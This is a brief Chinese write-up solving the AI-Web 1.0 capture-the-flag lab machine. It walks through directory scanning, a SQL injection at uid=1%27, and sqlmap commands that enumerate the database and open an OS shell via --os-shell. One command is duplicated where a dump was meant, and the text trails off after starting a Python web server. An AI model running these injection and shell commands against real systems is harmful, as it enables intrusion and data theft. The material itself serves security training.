Bootstrap

ai-web 1.0通关攻略

使用dirsearch扫描

访问robots.txt的内容 

 访问/m3diNF0/错误

访问/se3reTdir777/uploads/显示无权限

什么都没得到那就继续扫描

扫描/se3reTdir777/uploads/没得到什么

扫描/se3reTdir777/uploads/得到一个info.php 

提供了绝对路径

用dirsearch扫描se3reTdir777什么都没得到,再用dirb扫描得到index.php

进入index.php后发现存在sql注入漏洞,抓包得到

注入点为uid=1%27&Operation=Submit

使用sqlmap注入

sqlmap -u "http://192.168.31.131/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs

得到两个数据库

sqlmap -u "http://192.168.31.131/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 --tables

 

得到两个表名

sqlmap -u "http://192.168.31.131/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns

得到三个字段

sqlmap -u "http://192.168.31.131/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns

 

最后得到一堆废物(心态要好)

换一个思路,使用os-shell,phpinfo中得到绝对路径

sqlmap -u "http://192.168.31.131/se3reTdir777/index.php" -data "uid=1&Operation=Submit"  --level=3 --os-shell 

 先四后二,之后成功进入shell

部署页面

python -m http.server 8888 

 

 

 

;